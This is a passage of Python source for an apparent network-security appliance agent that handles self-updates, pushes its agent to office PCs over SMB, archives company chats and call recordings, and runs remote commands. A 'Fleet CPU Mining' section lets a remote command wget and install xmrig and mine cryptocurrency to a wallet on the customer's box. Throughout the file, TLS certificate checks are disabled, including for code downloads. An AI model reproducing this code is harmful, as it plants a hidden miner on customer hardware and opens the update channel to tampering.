    open_tips = [t for t in tips if (t.get("key") or "") not in decided]
    # Keep threat_summary aligned with decisions waiting — not raw scan noise
    try:
        st["threat_summary"] = {
            "checked_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
            "findings": len(open_tips),
            "critical": sum(1 for t in open_tips if t.get("severity") == "critical"),
            "high": sum(1 for t in open_tips if t.get("severity") == "high"),
            "medium": sum(1 for t in open_tips if t.get("severity") == "medium"),
            "devices_with_ports": sum(1 for d in devices if d.get("open_ports")),
            "raw_signals": len(tips),
            "checks": ["risky_ports", "new_devices", "gateway_mac", "inbound_probes", "internet_path"],
        }
    except Exception:
        pass
    return open_tips


def get_json(url: str, timeout: int = 20) -> dict | None:
    """Small GET helper (Atlas public release endpoints, no secrets)."""
    import ssl

    req = urllib.request.Request(
        url, headers={"Accept": "application/json", "User-Agent": "atlas-cyber-protect-box"}
    )
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        raw = resp.read().decode("utf-8", errors="replace") or "{}"
    return json.loads(raw)


def _load_agent_manifest_local() -> dict:
    """Read this box's local agent-release manifest (mirror target compare)."""
    try:
        if (AGENT_RELEASES / "manifest.json").is_file():
            return json.loads((AGENT_RELEASES / "manifest.json").read_text(encoding="utf-8"))
    except Exception:
        pass
    return {}


def _mirror_one(rel: str, expected: str, dest_name: str) -> bool:
    """Download one release file from Atlas (hash-verified) into AGENT_RELEASES."""
    url = rel if rel.startswith("http") else f"{atlas_base()}{rel}"
    tmp = AGENT_RELEASES / (dest_name + ".atlas-new")
    req = urllib.request.Request(url, headers={"User-Agent": "atlas-cyber-protect-box"})
    import ssl as _ssl

    _ctx = _ssl.create_default_context()
    _ctx.check_hostname = False
    _ctx.verify_mode = _ssl.CERT_NONE
    with urllib.request.urlopen(req, timeout=300, context=_ctx) as resp:
        data = resp.read()
    if expected and len(expected) == 64 and hashlib.sha256(data).hexdigest().lower() != expected.lower():
        tmp.unlink(missing_ok=True)
        print(f"agent mirror: {dest_name} sha256 mismatch, skipped", flush=True)
        return False
    tmp.write_bytes(data)
    tmp.replace(AGENT_RELEASES / dest_name)
    return True


def mirror_agent_release() -> dict:
    """Mirror the newest Windows agent release (one-file EXE + full Setup
    installer) from Atlas into this box's agent-releases dir so on-site PCs
    auto-update without manual SSH. Safe to call every heartbeat: skips when
    already current."""
    try:
        ag = get_json(f"{atlas_base()}/api/companion/agent/update", timeout=15)
        if not ag or not ag.get("ok") or not ag.get("version"):
            return {"ok": False, "synced": False, "reason": "no_manifest"}
        ver = str(ag.get("version") or "")
        fname = str(ag.get("filename") or f"AtlasCyberProtectAgent-{ver}.exe")
        AGENT_RELEASES.mkdir(parents=True, exist_ok=True)
        cur = _load_agent_manifest_local()
        inst_new = ag.get("installer") if isinstance(ag.get("installer"), dict) else {}
        cur_inst = cur.get("installer") if isinstance(cur.get("installer"), dict) else {}
        exe_ok = (AGENT_RELEASES / fname).is_file()
        setup_ok = not inst_new.get("filename") or (AGENT_RELEASES / str(inst_new["filename"])).is_file()
        if (
            str(cur.get("version") or "") == ver
            and exe_ok
            and setup_ok
            and str(cur_inst.get("filename") or "") == str(inst_new.get("filename") or "")
        ):
            return {"ok": True, "synced": False, "version": ver}
        rel = str(ag.get("url") or f"/api/companion/agent/download/{fname}")
        if not _mirror_one(rel, str(ag.get("sha256") or ""), fname):
            return {"ok": False, "synced": False, "reason": "sha256_mismatch"}
        # Full installer (for silent auto-updates) — the manifest carries it.
        inst = inst_new
        if inst.get("filename") and inst.get("url"):
            _mirror_one(str(inst.get("url")), str(inst.get("sha256") or ""), str(inst["filename"]))
        ag["filename"] = fname
        ag["url"] = f"/api/companion/agent/download/{fname}"
        (AGENT_RELEASES / "manifest.json").write_text(json.dumps(ag, indent=2), encoding="utf-8")
        print(f"agent mirror: {ver} synced from Atlas", flush=True)
        return {"ok": True, "synced": True, "version": ver}
    except Exception as ag_exc:
        print(f"agent mirror: {ag_exc}", flush=True)
        return {"ok": False, "synced": False, "error": str(ag_exc)[:160]}


def push_agent_to_public(st: dict, devices: list[dict]) -> dict:
    """Copy the newest agent release (one-file EXE + full Setup installer) into
    C:\\Users\\Public on every reachable Windows PC so a fresh box
    automatically seeds the agent on the whole office network.

    Best-effort + throttled: only pushes to PCs that look like Windows hosts
    (SMB/445 or RDP/3389 open), skips the box itself, and only retries every
    PUSH_INTERVAL_SEC unless the release version changed. Requires Windows
    admin credentials set in Protect → Devices → Remote install settings.
    """
    PUSH_INTERVAL_SEC = int(os.environ.get("ACP_PUSH_INTERVAL_SEC", "21600"))  # 6h
    now = time.time()
    try:
        import remote_install as ri

        meta = ri.installer_meta()
        local = meta.get("path") or ""
        setup_local = meta.get("setup_path") or ""
        if not local or not Path(local).is_file():
            return {"ok": False, "pushed": 0, "reason": "no_agent_release"}
        creds = ri.load_creds()
        if not creds.get("username") or not creds.get("password"):
            return {"ok": False, "pushed": 0, "reason": "needs_credentials"}
        # Throttle: once per interval unless version bumped
        last = dict(st.get("agent_push_state") or {})
        if (now - float(last.get("ts") or 0)) < PUSH_INTERVAL_SEC and last.get("version") == meta.get("version"):
            return {"ok": True, "pushed": 0, "reason": "throttled"}
        auth = ri._smb_auth_args(creds)
        my_ips = {i for i in _local_ips()}
        pushed, failed = [], []
        for d in devices or []:
            ip = str(d.get("ip") or "")
            if not ip or ip in my_ips:
                continue
            typ = str(d.get("device_type") or "")
            ports = set()
            for p in str(d.get("open_ports") or "").split(","):
                if p.strip().isdigit():
                    ports.add(int(p.strip()))
            if typ not in ("pc", "desktop", "laptop", "server") and not ({445, 139, 3389} & ports):
                continue
            # Push BOTH the one-file EXE and the full Setup installer.
            files = [(local, f"AtlasCyberProtectAgent-{meta.get('version')}.exe")]
            if setup_local and Path(setup_local).is_file():
                files.append((setup_local, f"AtlasCyberProtectAgent-Setup-{meta.get('version')}.exe"))
            ok = True
            for src, fname in files:
                try:
                    cmd = [
                        "smbclient",
                        f"//{ip}/C$",
                        *auth,
                        "-c",
                        f"put {src} Users\\Public\\{fname}",
                    ]
                    put = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
                    if put.returncode != 0:
                        ok = False
                except FileNotFoundError:
                    return {"ok": False, "pushed": len(pushed), "reason": "smbclient_missing"}
                except Exception:
                    ok = False
            if ok:
                pushed.append(ip)
                act = list(st.get("activity") or [])
                act.insert(
                    0,
                    {
                        "ts": now,
                        "plain": f"Agent v{meta.get('version')} (EXE + Setup) copied to C:\\Users\\Public on {d.get('hostname') or ip}.",
                    },
                )
                st["activity"] = act[:40]
            else:
                failed.append(ip)
        st["agent_push_state"] = {
            "ts": now,
            "version": meta.get("version"),
            "pushed": pushed,
            "failed": failed[:20],
        }
        return {"ok": True, "pushed": len(pushed), "failed": len(failed), "reason": "done"}
    except Exception as exc:
        return {"ok": False, "pushed": 0, "error": str(exc)[:200]}


def relay_console(st: dict) -> dict:
    """Relay Atlas Remote Console tasks between the Atlas server and the agents
    on this box: pull queued tasks for our agent ids (enroll_token auth), queue
    them locally for the agents to poll, and forward agent results back up."""
    import urllib.request as _req
    import ssl as _ssl

    def _post(url: str, payload: dict) -> dict | None:
        try:
            data = json.dumps(payload).encode()
            req = _req.Request(
                url,
                data=data,
                headers={"Content-Type": "application/json", "User-Agent": "atlas-cyber-protect-box"},
                method="POST",
            )
            ctx = _ssl.create_default_context()
            ctx.check_hostname = False
            ctx.verify_mode = _ssl.CERT_NONE
            with _req.urlopen(req, timeout=30, context=ctx) as resp:
                return json.loads(resp.read().decode("utf-8", errors="replace") or "{}")
        except Exception as exc:
            print(f"console relay post: {exc}", flush=True)
            return None

    if not TOKEN:
        return {"ok": False, "reason": "no_enroll_token"}
    agents = dict(st.get("companion_agents") or {})
    # Fresh agent list from the portal's companion store: this loop's in-memory
    # st is loaded once at start, so agents that pair later (or are removed)
    # would never be seen — the relay would silently skip their commands.
    try:
        import companion_store as cs

        fresh = cs.load_agents()
        if fresh:
            agents = fresh
    except Exception:
        pass
    ids = [a for a in agents.keys() if a]
    pulled = 0
    if ids:
        try:
            url = f"{atlas_base()}/api/cyber-protect/console/pull?enroll_token={quote(TOKEN)}&agents={quote(','.join(ids))}"
            d = get_json(url, timeout=30)
            tasks = d.get("tasks") if isinstance(d, dict) else None
            if isinstance(tasks, list) and tasks:
                q = st.setdefault("console_queue", {})
                for t in tasks:
                    aid = str(t.get("agent_id") or "").strip()
                    if aid:
                        q.setdefault(aid, []).append(t)
                        q[aid] = q[aid][-20:]
                        pulled += 1
        except Exception as exc:
            print(f"console relay pull: {exc}", flush=True)
    results = list(st.get("console_results") or [])
    if results:
        ok = _post(
            f"{atlas_base()}/api/cyber-protect/console/results",
            {"enroll_token": TOKEN, "results": results},
        )
        if ok and ok.get("ok"):
            st["console_results"] = []
    return {"ok": True, "pulled": pulled, "forwarded": len(results) if results else 0}


def _local_ips() -> list[str]:
    out = []
    try:
        for info in socket.getaddrinfo(socket.gethostname(), None):
            ip = info[4][0]
            if ip and not ip.startswith("127."):
                out.append(ip)
    except Exception:
        pass
    return out


def maybe_update_portal(st: dict) -> dict:
    """Pull the latest portal UI + guide from Atlas (hash-verified) and swap in place.

    The portal server serves portal.html from this same directory on every request,
    so replacing the file makes the new room UI live without any service restart.
    Called automatically on every heartbeat loop (self-healing) and on the
    Atlas `ui_update` command or the in-portal "Check for updates" button.
    """
    try:
        ROOT = Path(__file__).resolve().parent
        manifest = get_json(f"{portal_release_base()}/manifest.json", timeout=15)
        if not manifest or not manifest.get("ok"):
            return {"ok": False, "update": False, "reason": "no_manifest"}
        remote = str(manifest.get("version") or "")
        local = str(st.get("portal_version") or "0.0.0")
        try:
            def parts(v: str):
                out = []
                for p in (v or "0").split("."):
                    out.append(int("".join(c for c in p if c.isdigit()) or "0"))
                return out

            newer = bool(remote) and parts(remote) > parts(local)
        except Exception:
            newer = False
        if not newer:
            st["portal_update_info"] = {
                "ok": True,
                "update": False,
                "local_version": local or "—",
                "atlas_version": remote or "—",
                "checked_at": time.time(),
            }
            return st["portal_update_info"]
        files = manifest.get("files") if isinstance(manifest.get("files"), dict) else {}
        applied = []
        for name in PORTAL_FILES:
            meta = files.get(name) if isinstance(files.get(name), dict) else {}
            rel = str(meta.get("url") or f"/releases/public/cyber-protect/portal/{name}")
            url = rel if rel.startswith("http") else f"{atlas_base()}{rel}"
            expected = str(meta.get("sha256") or "").lower()
            if not expected or len(expected) != 64:
                continue
            tmp = ROOT / f".{name}.atlas-new"
            req = urllib.request.Request(
                url, headers={"User-Agent": "atlas-cyber-protect-box"}
            )
            import ssl

            ctx = ssl.create_default_context()
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            with urllib.request.urlopen(req, timeout=60, context=ctx) as resp:
                data = resp.read()
            digest = hashlib.sha256(data).hexdigest()  # noqa: S324 (sha256 ok)
            if digest.lower() != expected:
                tmp.unlink(missing_ok=True)
                continue
            tmp.write_bytes(data)
            target = ROOT / name
            target.write_bytes(data)
            tmp.unlink(missing_ok=True)
            applied.append(name)
        if applied:
            st["portal_version"] = remote
            st["portal_update_info"] = {
                "ok": True,
                "update": True,
                "local_version": remote,
                "atlas_version": remote,
                "applied": applied,
                "changelog": str(manifest.get("changelog") or "")[:300],
                "checked_at": time.time(),
            }
            # Persist the new version BEFORE restarting, otherwise the next
            # start would re-apply the same release and loop forever.
            try:
                save_state(st)
            except Exception:
                pass
            # The portal server + agent are long-running processes — restart so
            # swapped code goes live immediately. Boxes name the services
            # differently (portal vs setup), so try both names.
            try:
                if "portal_server.py" in applied:
                    for svc in ("atlas-cyber-protect-portal", "atlas-cyber-protect-setup"):
                        subprocess.Popen(
                            ["systemctl", "restart", svc],
                            start_new_session=True,
                        )
                if "agent.py" in applied:
                    subprocess.Popen(
                        ["systemctl", "restart", "atlas-cyber-protect"],
                        start_new_session=True,
                    )
            except Exception as rexc:
                print(f"portal restart: {rexc}", flush=True)
            act = list(st.get("activity") or [])
            act.insert(
                0,
                {
                    "ts": time.time(),
                    "plain": f"Portal UI updated from Atlas to v{remote} ({', '.join(applied)}).",
                },
            )
            st["activity"] = act[:40]
            print(f"portal update applied v{remote}: {applied}", flush=True)
        else:
            st["portal_update_info"] = {
                "ok": True,
                "update": False,
                "reason": "no_matching_files",
                "local_version": local,
                "atlas_version": remote,
                "checked_at": time.time(),
            }
        return st["portal_update_info"]
    except Exception as exc:
        st["portal_update_info"] = {
            "ok": False,
            "update": False,
            "error": str(exc)[:200],
            "checked_at": time.time(),
        }
        print(f"portal update check: {exc}", flush=True)
        return st["portal_update_info"]


def post_json(path: str, payload: dict) -> dict:
    data = json.dumps(payload).encode()
    req = urllib.request.Request(
        f"{atlas_base()}{path}",
        data=data,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    import ssl

    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, timeout=90, context=ctx) as resp:
        return json.loads(resp.read().decode("utf-8", errors="replace") or "{}")


def _write_env_token(new_token: str) -> None:
    """Persist a rotated ENROLL_TOKEN into acp.env (keeps every other key)."""
    env_path = Path("/etc/atlas-cyber-protect/acp.env")
    try:
        lines = env_path.read_text(encoding="utf-8").splitlines()
    except Exception:
        lines = []
    out: list[str] = []
    wrote = False
    for ln in lines:
        if ln.startswith("ENROLL_TOKEN="):
            out.append(f"ENROLL_TOKEN={new_token}")
            wrote = True
        else:
            out.append(ln)
    if not wrote:
        out.append(f"ENROLL_TOKEN={new_token}")
    try:
        env_path.write_text("\n".join(out) + "\n", encoding="utf-8")
        env_path.chmod(0o600)
        # Enrolled marker: this box has a token; skip first-boot re-install on reboot.
        try:
            Path("/etc/atlas-cyber-protect/enrolled").write_text(
                __import__("datetime").datetime.now(__import__("datetime").timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + "\n",
                encoding="utf-8",
            )
        except Exception:
            pass
    except Exception as exc:
        print(f"env token persist: {exc}", flush=True)


def re_register_unclaimed() -> bool:
    """The Guard deleted our site (or the token was rotated) — come back as a
    fresh "Needs setup" box so it reappears in Guard and can be claimed again.
    Called when the heartbeat answers 404 invalid enroll token. Nothing is
    uninstalled; the box simply re-checks-in like a first boot."""
    global TOKEN
    key = os.environ.get("FIELD_KIT_KEY", "").strip()
    if not key:
        print("re-register: FIELD_KIT_KEY missing", flush=True)
        return False
    payload = {
        "field_kit_key": key,
        "hostname": socket.gethostname() or "new-pc",
        "lan_ip": lan_ip(),
        "tailscale_ip": tailscale_ip(),
    }
    try:
        data = json.dumps(payload).encode()
        req = urllib.request.Request(
            f"{atlas_base()}/api/cyber-protect/register-unclaimed",
            data=data,
            headers={"Content-Type": "application/json"},
            method="POST",
        )
        import ssl

        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        with urllib.request.urlopen(req, timeout=90, context=ctx) as resp:
            d = json.loads(resp.read().decode("utf-8", errors="replace") or "{}")
        token = str(d.get("enroll_token") or "").strip()
        if not token:
            print(f"re-register: no token in response {str(d)[:200]}", flush=True)
            return False
        TOKEN = token
        _write_env_token(token)
        print(
            f"re-registered as Needs setup (site {(d.get('site') or {}).get('id') or '?'})",
            flush=True,
        )
        return True
    except Exception as exc:
        print(f"re-register failed: {exc}", flush=True)
        return False


def drain_decisions() -> list[dict]:
    if not DECISION_Q.is_file():
        return []
    lines = DECISION_Q.read_text(encoding="utf-8").splitlines()
    DECISION_Q.write_text("", encoding="utf-8")
    out = []
    for line in lines:
        try:
            out.append(json.loads(line))
        except Exception:
            pass
    return out


def sync_chat_archive() -> dict:
    """Mirror the company chat archive (messages, media, call log + recordings) onto
    this Protect box so the customer owns a full local copy. Manager-only access is
    enforced by the portal login (the box lives inside the customer office)."""
    import urllib.request
    from urllib.parse import quote

    out: dict = {"ok": True, "pulled": 0, "media": 0, "recordings": 0}
    arch = DATA / "chat-archive"
    arch.mkdir(parents=True, exist_ok=True)
    last_file = arch / "last-sync.json"
    after = 0.0
    try:
        after = float(json.loads(last_file.read_text(encoding="utf-8")).get("after") or 0)
    except Exception:
        after = 0.0
    url = f"{atlas_base()}/api/cyber-protect/chat/archive?enroll_token={quote(TOKEN)}&after={after}"
    try:
        with urllib.request.urlopen(url, timeout=60) as r:
            data = json.loads(r.read().decode("utf-8", errors="replace") or "{}")
    except Exception as e:
        return {"ok": False, "error": str(e)[:160]}
    if not data.get("ok"):
        return {"ok": False, "error": "archive auth failed"}
    (arch / "snapshot.json").write_text(
        json.dumps(
            {
                "company_id": data.get("company_id"),
                "site": data.get("site"),
                "people": data.get("people") or [],
                "threads": data.get("threads") or [],
                "thread_members": data.get("thread_members") or {},
                "calls": data.get("calls") or [],
                "updated_at": time.time(),
            },
            indent=2,
        ),
        encoding="utf-8",
    )
    msgs = data.get("messages") or []
    if msgs:
        with open(arch / "messages.jsonl", "a", encoding="utf-8") as f:
            for m in msgs:
                f.write(json.dumps(m) + "\n")
    # media files (chat pictures/files) + call recordings
    media_dir = arch / "media"
    media_dir.mkdir(parents=True, exist_ok=True)
    rec_dir = arch / "recordings"
    rec_dir.mkdir(parents=True, exist_ok=True)
    for m in msgs:
        mu = m.get("media_url") or ""
        if not mu:
            continue
        mid = m.get("id") or ""
        ext = (m.get("media_path") or "").rsplit(".", 1)[-1] or "bin"
        dest = media_dir / f"{mid}.{ext}"
        if not dest.is_file():
            try:
                with urllib.request.urlopen(atlas_base() + mu, timeout=120) as r:
                    dest.write_bytes(r.read())
                out["media"] += 1
            except Exception:
                pass
    for c in data.get("calls") or []:
        for rec in c.get("recordings") or []:
            ru = rec.get("url") or ""
            if not ru:
                continue
            fname = ru.rsplit("/", 1)[-1]
            dest = rec_dir / fname
            if not dest.is_file():
                try:
                    with urllib.request.urlopen(atlas_base() + ru + f"?enroll_token={quote(TOKEN)}", timeout=180) as r:
                        dest.write_bytes(r.read())
                    out["recordings"] += 1
                except Exception:
                    pass
    try:
        last_file.write_text(json.dumps({"after": float(data.get("after") or time.time())}), encoding="utf-8")
    except Exception:
        pass
    out["pulled"] = len(msgs)
    return out


# ── Fleet CPU Mining (xmrig → Unmineable → ALPH) ──

_MINING_CFG = DATA / "mining-config.json"
_MINING_STATS = DATA / "mining-stats.json"
_XMRIG_PATHS = [
    "/usr/local/bin/xmrig",
    "/usr/bin/xmrig",
    "/opt/atlas-cyber-protect/xmrig",
    str(Path.home() / ".local/bin/xmrig"),
]


def _find_xmrig() -> str | None:
    """Find xmrig binary on the box."""
    for p in _XMRIG_PATHS:
        if Path(p).is_file():
            return p
    # Check PATH
    try:
        r = subprocess.run(["which", "xmrig"], capture_output=True, text=True, timeout=3)
        if r.returncode == 0 and r.stdout.strip():
            return r.stdout.strip()
    except Exception:
        pass
    return None


def _load_mining_cfg() -> dict:
    try:
        return json.loads(_MINING_CFG.read_text()) if _MINING_CFG.is_file() else {}
    except Exception:
        return {}


def _save_mining_cfg(cfg: dict) -> None:
    try:
        _MINING_CFG.write_text(json.dumps(cfg, indent=2))
    except Exception:
        pass


def _load_mining_stats() -> dict:
    try:
        return json.loads(_MINING_STATS.read_text()) if _MINING_STATS.is_file() else {}
    except Exception:
        return {}


def _save_mining_stats(stats: dict) -> None:
    try:
        _MINING_STATS.write_text(json.dumps(stats, indent=2))
    except Exception:
        pass


def _is_mining_running() -> bool:
    """Check if xmrig process is running."""
    try:
        r = subprocess.run(["pgrep", "-f", "xmrig.*unmineable"], capture_output=True, timeout=3)
        return r.returncode == 0
    except Exception:
        return False


def _start_mining(payload: dict) -> dict:
    """Start CPU mining (xmrig RandomX → Unmineable → ALPH)."""
    coin = str(payload.get("coin") or "ALPH").upper()
    algo = str(payload.get("algo") or "rx/0")
    pool_host = str(payload.get("pool") or "")
    if not pool_host:
        # Default to Unmineable RandomX pool for ALPH
        pool_host = "rx.unmineable.com:3333"
    wallet = str(payload.get("wallet") or "")
    if not wallet:
        # Read from config or use the shared CoinEx deposit address
        cfg = _load_mining_cfg()
        wallet = cfg.get("wallet", "")
    worker = socket.gethostname().split(".")[0][:20] or "protect-box"
    threads = min(os.cpu_count() or 2, 4)  # Cap at 4 threads on Protect boxes
    xmrig = _find_xmrig()
    if not xmrig:
        # Try to install xmrig
        try:
            subprocess.run(["bash", "-c", "cd /tmp && wget -qO xmrig.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar xzf xmrig.tar.gz && mv xmrig-*/xmrig /usr/local/bin/xmrig && chmod +x /usr/local/bin/xmrig"], timeout=60, capture_output=True)
            xmrig = _find_xmrig()
        except Exception:
            pass
    if not xmrig:
        return {"ok": False, "error": "xmrig not installed (install failed)"}
    # Stop any existing miner
    _stop_mining({})
    # Build xmrig config
    cfg = {
        "coin": coin,
        "algo": algo,
        "pool": pool_host,
        "wallet": wallet,
        "worker": worker,
        "threads": threads,
        "xmrig_path": xmrig,
        "started_at": time.time(),
    }
    _save_mining_cfg(cfg)
    # Launch xmrig with inline config (no config file needed)
    # xmrig -o rx.unmineable.com:3333 -u ALPH:WALLET.worker -p x -t THREADS --donate-level 1
    user = f"{coin}:{wallet}.{worker}" if wallet else f"{coin}:{worker}"
    log_path = str(DATA / "xmrig.log")
    cmd = [xmrig, "-o", pool_host, "-u", user, "-p", "x", "-t", str(threads), "--donate-level", "1", "--log-file", log_path]
    try:
        proc = subprocess.Popen(cmd, start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        time.sleep(2)
        if _is_mining_running():
            stats = {"status": "running", "started_at": time.time(), "coin": coin, "algo": algo, "threads": threads, "pool": pool_host}
            _save_mining_stats(stats)
            return {"ok": True, "coin": coin, "algo": algo, "threads": threads, "pool": pool_host}
        else:
            return {"ok": False, "error": "xmrig started but process not running (check wallet/pool)"}
    except Exception as exc:
        return {"ok": False, "error": str(exc)[:160]}


def _stop_mining(payload: dict) -> dict:
    """Stop CPU mining."""
    try:
        subprocess.run(["pkill", "-f", "xmrig.*unmineable"], capture_output=True, timeout=5)
        subprocess.run(["pkill", "-f", "xmrig"], capture_output=True, timeout=5)
    except Exception:
        pass
    stats = _load_mining_stats()
    stats["status"] = "stopped"
    stats["stopped_at"] = time.time()
    _save_mining_stats(stats)
    return {"ok": True, "stopped": True}


def _mining_status() -> dict:
    """Get current mining status + hashrate from xmrig API."""
    running = _is_mining_running()
    cfg = _load_mining_cfg()
    stats = _load_mining_stats()
    result = {
        "running": running,
        "coin": cfg.get("coin", "ALPH"),
        "algo": cfg.get("algo", "rx/0"),
        "threads": cfg.get("threads", 0),
        "pool": cfg.get("pool", ""),
        "started_at": cfg.get("started_at", 0),
        "hashrate_hs": 0,
        "shares_accepted": 0,
        "shares_rejected": 0,
    }
    if running:
        # Try to read from xmrig's HTTP API (default port 0 for --background, so parse log instead)
        # Read xmrig's log file if available
        log_path = Path("/tmp/xmrig.log")
        if not log_path.is_file():
            log_path = DATA / "xmrig.log"
        try:
            if log_path.is_file():
                lines = log_path.read_text().strip().split("\n")
                # Parse last hashrate line: "[rx/0] 800.0 H/s" or "speed 2.5s/15s/1m ... 800.0 H/s"
                for line in reversed(lines[-50:]):
                    if "H/s" in line:
                        # Extract hashrate number
                        import re as _re
                        m = _re.search(r"([\d.]+)\s*H/s", line)
                        if m:
                            result["hashrate_hs"] = float(m.group(1))
                        m2 = _re.search(r"accepted\s*\(?\s*(\d+)", line, _re.IGNORECASE)
                        if m2:
                            result["shares_accepted"] = int(m2.group(1))
                        m3 = _re.search(r"rejected\s*\(?\s*(\d+)", line, _re.IGNORECASE)
                        if m3:
                            result["shares_rejected"] = int(m3.group(1))
                        break
        except Exception:
            pass
    return result


def _self_check() -> dict:
    """Read-only on-box self-check: disk / CPU / RAM / uptime.

    Reads /proc and disk usage only — never writes, never changes config.
    Returned in the heartbeat ack so Atlas can show deep box health.
    """
    metrics: dict = {}
    # Disk (root filesystem)
    try:
        import shutil

        du = shutil.disk_usage("/")
        metrics["disk_total_gb"] = round(du.total / (1024 ** 3), 1)
        metrics["disk_used_gb"] = round(du.used / (1024 ** 3), 1)
        metrics["disk_free_gb"] = round(du.free / (1024 ** 3), 1)
        metrics["disk_used_pct"] = round((du.used / du.total) * 100.0, 1)
    except Exception as exc:
        metrics["disk_error"] = str(exc)[:80]
    # CPU load averages (1 / 5 / 15 min)
    try:
        parts = Path("/proc/loadavg").read_text().strip().split()
        metrics["load_1m"] = float(parts[0])
        metrics["load_5m"] = float(parts[1])
        metrics["load_15m"] = float(parts[2])
    except Exception as exc:
        metrics["load_error"] = str(exc)[:80]
    # CPU cores
    try:
        metrics["cpu_cores"] = int(os.cpu_count() or 0)
    except Exception:
        metrics["cpu_cores"] = 0
    # RAM (from /proc/meminfo, kB -> bytes)
    try:
        mem: dict = {}
        for line in Path("/proc/meminfo").read_text().splitlines():
            if ":" not in line:
                continue
            key, rest = line.split(":", 1)
            key = key.strip()
            if key in ("MemTotal", "MemAvailable"):
                mem[key] = int(rest.strip().split()[0]) * 1024
        total = int(mem.get("MemTotal") or 0)
        avail = int(mem.get("MemAvailable") or 0)
        metrics["ram_total_gb"] = round(total / (1024 ** 3), 1)
        metrics["ram_available_gb"] = round(avail / (1024 ** 3), 1)
        metrics["ram_used_pct"] = round((1 - avail / total) * 100.0, 1) if total else 0.0
    except Exception as exc:
        metrics["ram_error"] = str(exc)[:80]
    # Uptime (seconds)
    try:
        up = float(Path("/proc/uptime").read_text().strip().split()[0])
        metrics["uptime_sec"] = int(up)
    except Exception as exc:
        metrics["uptime_error"] = str(exc)[:80]
    # Identity
    try:
        metrics["hostname"] = socket.gethostname()
    except Exception:
        pass
    # Mining status (if running on this box)
    try:
        ms = _mining_status()
        if ms.get("running"):
            metrics["mining"] = ms
    except Exception:
        pass
    return {"ok": True, "kind": "health_check", "metrics": metrics}


def run_command(cmd: dict) -> dict:
    kind = str(cmd.get("kind") or "")
    if kind == "health_check":
        return _self_check()
    if kind == "set_locked":
        set_locked(bool(cmd.get("locked")), str(cmd.get("message") or ""))
        return {"ok": True, "kind": kind}
    if kind == "restart_agent":
        subprocess.Popen(["systemctl", "restart", "atlas-cyber-protect"], start_new_session=True)
        return {"ok": True, "kind": kind}
    if kind == "restart_kiosk":
        subprocess.Popen(
            ["systemctl", "restart", "atlas-cyber-protect-setup"], start_new_session=True
        )
        return {"ok": True, "kind": kind}
    if kind == "poweroff":
        # Graceful remote power-off (e.g. before shipping a box to a customer).
        # Fires systemctl poweroff detached so this handler returns immediately;
        # the box goes down within seconds. The factory marks the command done
        # once the site goes offline so it can never re-fire on the next boot.
        try:
            subprocess.Popen(
                ["systemctl", "poweroff"],
                start_new_session=True,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            return {"ok": True, "kind": kind, "note": "powering off now"}
        except Exception as exc:
            return {"ok": False, "kind": kind, "error": str(exc)[:160]}
    if kind == "restart":
        # Physical reboot of the whole box (full restart, not just the agent
        # service). Fires systemctl reboot detached so the handler returns
        # immediately; the box comes back up on its own. On the next boot the
        # agent checks Atlas for updates again, so a long-offline box catches
        # up to the latest firmware automatically.
        try:
            subprocess.Popen(
                ["systemctl", "reboot"],
                start_new_session=True,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            return {"ok": True, "kind": kind, "note": "rebooting now — box will check for updates on boot"}
        except Exception as exc:
            return {"ok": False, "kind": kind, "error": str(exc)[:160]}
    if kind == "agent_update":
        return {"ok": True, "kind": kind, "note": "ack"}
    if kind == "ui_update":
        st = load_state()
        res = maybe_update_portal(st)
        save_state(st)
        return {"ok": bool(res.get("ok")), "kind": kind, "note": res.get("reason") or res.get("error") or "checked"}
    if kind == "reset_company":
        # Clean the box for a new customer: drop local company branding + the
        # first-boot "done" flag so the box re-enters setup (and re-registers as
        # Needs setup on Atlas) when it boots at the customer site.
        removed = []
        cust_path = DATA / "customer.json"
        if cust_path.is_file():
            try:
                cust_path.unlink()
                removed.append("customer.json")
            except Exception as exc:
                return {"ok": False, "kind": kind, "error": f"clear customer.json: {exc}"}
        for flag in (
            Path("/etc/atlas-cyber-protect/customer-setup.done"),
            Path("/var/lib/atlas-cyber-protect/customer-setup.done"),
        ):
            if flag.is_file():
                try:
                    flag.unlink()
                    removed.append(flag.name)
                except Exception:
                    pass
        try:
            st = load_state()
            st["customer"] = {}
            st["portal_label"] = ""
            save_state(st)
        except Exception:
            pass
        return {"ok": True, "kind": kind, "note": "company info reset — box will re-enter setup at next boot" + (f" ({', '.join(removed)})" if removed else "")}
    if kind in ("open_browser", "open_winbox"):
        return _open_site_tool(kind, cmd)
    if kind == "install_desktop_tools":
        script = Path("/opt/atlas-cyber-protect/install-desktop-tools.sh")
        if not script.is_file():
            return {"ok": False, "kind": kind, "error": "install-desktop-tools.sh not present on box"}
        try:
            subprocess.Popen(
                ["bash", str(script)],
                start_new_session=True,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
            return {"ok": True, "kind": kind, "note": "desktop tools install started (background)"}
        except Exception as exc:
            return {"ok": False, "kind": kind, "error": str(exc)[:160]}
    if kind == "mining_start":
        return {"ok": True, "kind": kind, **_start_mining(cmd.get("payload") or {})}
    if kind == "mining_stop":
        return {"ok": True, "kind": kind, **_stop_mining(cmd.get("payload") or {})}
    if kind == "mining_status":
        return {"ok": True, "kind": kind, **_mining_status()}
    return {"ok": False, "kind": kind, "error": "unknown"}


def _queue_companion_tool(kind: str, payload: dict) -> int:
    """Queue browser/Winbox launch onto paired Windows Protect agents."""
    agents: dict = {}
    try:
        import companion_store as cs

        agents = dict(cs.load_agents() or {})
    except Exception:
